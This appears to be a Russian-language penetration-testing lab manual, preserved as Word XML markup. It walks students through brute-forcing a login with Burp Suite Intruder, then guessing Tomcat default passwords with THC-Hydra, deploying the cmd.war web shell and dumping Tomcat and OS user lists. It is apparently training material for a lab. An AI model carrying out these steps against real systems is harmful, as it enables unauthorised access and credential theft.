    <w:p w:rsid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5F5F9D" w:rsidRPr="00EF49CB" w:rsidRDefault="005F5F9D" w:rsidP="005F5F9D">
      <w:r w:rsidRPr="005F5F9D">
        <w:t xml:space="preserve">Шаг 1. Запустите </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t xml:space="preserve"> (Главн</w:t>
      </w:r>
      <w:r>
        <w:t>ое меню → Анализ веб-приложений </w:t>
      </w:r>
      <w:r w:rsidRPr="005F5F9D">
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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DA7BD46" wp14:editId="6714F301">
            <wp:extent cx="3234616" cy="2905306"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="2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3"/>
                    <a:srcRect t="2654"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3232117" cy="2903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F9D" w:rsidRPr="00EF49CB" w:rsidRDefault="005F5F9D" w:rsidP="005F5F9D">
      <w:r w:rsidRPr="005F5F9D">
        <w:t>Шаг 2. Настройте прокси в браузере (Настройки → Дополнительные → Сеть → Соединение)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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39843A5" wp14:editId="1367EEAE">
            <wp:extent cx="4023834" cy="2712552"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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8669" cy="2715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F5F9D" w:rsidRPr="00EF49CB" w:rsidRDefault="005F5F9D" w:rsidP="005F5F9D">
      <w:r w:rsidRPr="005F5F9D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Шаг 3. Убедитесь, что в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t xml:space="preserve"> во вкладке </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>Proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>Intercept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t xml:space="preserve"> отключена настройка </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>Intercept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>Intercept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>off</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F5F9D">
        <w:t>).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9DD5DAE" wp14:editId="1C5FB1B5">
            <wp:extent cx="4868334" cy="1210733"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="35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 rotWithShape="1">
                    <a:blip r:embed="rId135"/>
                    <a:srcRect t="8307" b="21481"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4867275" cy="121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4. Перейдите на страницу с заданием. Данные для входа: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin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password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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C665EE9" wp14:editId="0E53E278">
            <wp:extent cx="4961467" cy="2396066"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="34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 rotWithShape="1">
                    <a:blip r:embed="rId136"/>
                    <a:srcRect b="26857"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4963478" cy="239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5. Пройдите авторизацию при вкл</w:t>
      </w:r>
      <w:r w:rsidR="005F5F9D">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>юченном перехвате (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F5F9D">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Intercept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F5F9D">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F5F9D">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F5F9D">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) запросов в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Burp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Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (данные для входа произвольные; пример: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>user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user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) 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E749D72" wp14:editId="5AC922D0">
            <wp:extent cx="5940115" cy="2988733"/>
            <wp:effectExtent l="0" t="0" r="3810" b="2540"/>
            <wp:docPr id="26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37"/>
                    <a:srcRect b="25528"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940115" cy="298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6. </w:t>
      </w:r>
      <w:r w:rsidR="005F5F9D">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Перехват запроса. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пример перехваченного запроса представлен ниже.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3134C8F" wp14:editId="666CCF68">
            <wp:extent cx="4992053" cy="3592038"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="367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053" cy="359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7. </w:t>
      </w:r>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Передача запроса в модуль </w:t>
      </w:r>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A638AB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Intruder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Выделите запрос и передайте в модуль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Intruder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A638A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EAC4778" wp14:editId="523E981D">
            <wp:extent cx="4340980" cy="3123558"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24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0980" cy="3123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38AB" w:rsidRDefault="00A638A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8. </w:t>
      </w:r>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Подготовка запроса. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В модуле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Intruder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символы § определяют, какие поля будут  менять в ходе атаки. Удалите все такие символы, кроме полей для имени пользователя и пароля.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 </w:t>
      </w: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5A4905C" wp14:editId="5542FD27">
            <wp:extent cx="5082916" cy="3652808"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="361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7377" cy="3656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A638AB" w:rsidP="00EF49C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Шаг 9. Выбор</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> тип</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> атаки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="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cluster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bomb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8ABEA1A" wp14:editId="2640DDAF">
            <wp:extent cx="5642286" cy="4053248"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="28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286" cy="4053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A638AB" w:rsidP="00EF49C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lastRenderedPageBreak/>
        <w:t>Шаг 10. Настройка списков значений. Перейдите во вкладку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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 xml:space="preserve">. Установите списки значений для выбранных полей: имена пользователей и пароли пользователей. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00A638AB" w:rsidP="00EF49C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Имена пользователей.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D438F20" wp14:editId="53D6B2EA">
            <wp:extent cx="4760433" cy="3414908"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26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0433" cy="34149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Пароли пользователей</w:t>
      </w:r>
      <w:r w:rsidR="00A638A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ACAC580" wp14:editId="0007A21C">
            <wp:extent cx="4759245" cy="3413196"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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9245" cy="3413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11. </w:t>
      </w:r>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Установка</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> правила анализа полученной страницы после попытки авторизации. Признаком успешной аутентификации являет</w:t>
      </w:r>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ся отсутствие фразы «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>incorrect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.»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D281670" wp14:editId="45F18A93">
            <wp:extent cx="4411028" cy="3159823"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26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028" cy="315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12. </w:t>
      </w:r>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запуск атаки</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Правильная комбинация отобразится без отмеченного чек-бокса в столбце с контрольной фразой.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63C0AD3" wp14:editId="58782ECC">
            <wp:extent cx="4801553" cy="3508827"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="388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1553" cy="3508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b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc107507619"/>
      <w:bookmarkStart w:id="38" w:name="_Toc107513738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5.3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>Выполнение команд ОС через веб-приложение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38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научиться подбирать пароли в случае применения базовой аутентификации, а также получить опыт запуска команд операционной системы через </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>специальное</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> веб-приложение.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Задание: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 xml:space="preserve">найти в </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нтернете</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> какие пароли по умолчанию устанавливаются в TOMCAT;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и</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>спользуя THC-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, проверить подходят ли пароли по умолчанию для порта 8180;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н</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">айти в сети Интернет веб-приложение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cmd.war</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и загрузить в TOMCAT-сервер;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в</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ыгрузить список пользователей TOMCAT из конфигурационного файла;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в</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ыгрузить список пользователей ОС.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1. Отключить прокси.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2. Проверить пароль по умолчанию.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1C09C59" wp14:editId="053B017D">
            <wp:extent cx="5940115" cy="2349500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="389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3. Скачать файл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cmd.war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, размещенный в архиве https://sourceforge.net/projects/laudanum/files/latest/download. Для этого необходимо выставить тип подключения NAT и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>переподключиться</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> к сети.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7A70895" wp14:editId="1E011885">
            <wp:extent cx="3784600" cy="2626324"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
            <wp:docPr id="28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948" cy="2627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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6B6AA0B6" wp14:editId="74A44E7D">
                <wp:extent cx="3619500" cy="4886325"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="230" name="Группа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9500" cy="4886325"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="3603576" cy="4863350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="4" name="Shape 3"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14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3603576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Прямоугольник 6"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1612875" y="4818950"/>
                            <a:ext cx="688500" cy="196800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="28575" cap="flat" cmpd="sng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01AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49C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30" o:spid="_x0000_s1036" style="width:285pt;height:384.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin="1524,1524" coordsize="36035,48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blRmQMAABUIAAAOAAAAZHJzL2Uyb0RvYy54bWysVduO5DQQfUfiH6y8&#10;76TTt8m0pmeFdrZHKy3QmoUPcDtOYpHYxnbfeELiFYkHPoBfQOIFcVl+IfNHHNvp7rmwWlgxo8m4&#10;nErV8alTrsvnu7YhG26sUHKeZGeDhHDJVCFkNU++/GLxLE+IdVQWtFGSz5M9t8nzq48/utzqGR+q&#10;WjUFNwRBpJ1t9TypndOzNLWs5i21Z0pziZelMi11ME2VFoZuEb1t0uFgME23yhTaKMatxe51fJlc&#10;hfhlyZn7vCwtd6SZJ8DmwtOE58o/06tLOqsM1bVgPQz6AShaKiSSHkNdU0fJ2ognoVrBjLKqdGdM&#10;takqS8F4OANOkw0enebGqLUOZ6lm20ofaQK1j3j64LDss83SEFHMk+EI/Ejaokjdj3ff3n3X/YXf&#10;n4nfB0tbXc3gfGP0G700/UYVLX/wXWla/x9HIrvA7/7IL985wrA5mmYXkwHSMLwb5/l0NJzECrAa&#10;ZfLfZZPh2HvAoV+GCrH65THGYDQ5nx5iTEejScCXHiCkHukRmBZshr+eOqyeUPd+ieErtzY86YO0&#10;/ypGS81Xa/0MVdbUiZVohNsHxaKeHpTcLAVbmmicqjA+1OBNTTUnI0+Pd/ce3p9ow0tubnmDqBt+&#10;y634BhWLFDyJu2qEXoim8YXx6/4E0P8j/fwDCVGb14qtWy5dbDYT0ippa6FtQsyMtysO7ZhXRRbk&#10;Txtd009VsRA7AEdNfFaf3TrDHav9sgSgWzRmdDi+SD36E2BvWSjNf/FIW+/QyEllDxQyys8hqJjs&#10;EEgb6264asGmxZVggCbC37y2Pa6Di88vlScRIeiskQ82cEK/E7BHtGEJ8L5jcKXZA+ewnrD+n7o2&#10;CAIofdiTXtAIfc/+hJ79ofuje4vO/aV72/1+9333Z/dr9xuZ+tP3nx2b176T3Wk2zM8noQXHeZaj&#10;Y2OPHvid5vmxibOLaf6/sku2uInyic/PKOZBCZ1j2WqozMoqVMmqRkBhUdbWVKsXjSEbiht+sRjg&#10;py/2Azdfzmtq6+gXXsVT4YqVRShtzWnxUhbE7TU6SmJcJR6NbRPScAw3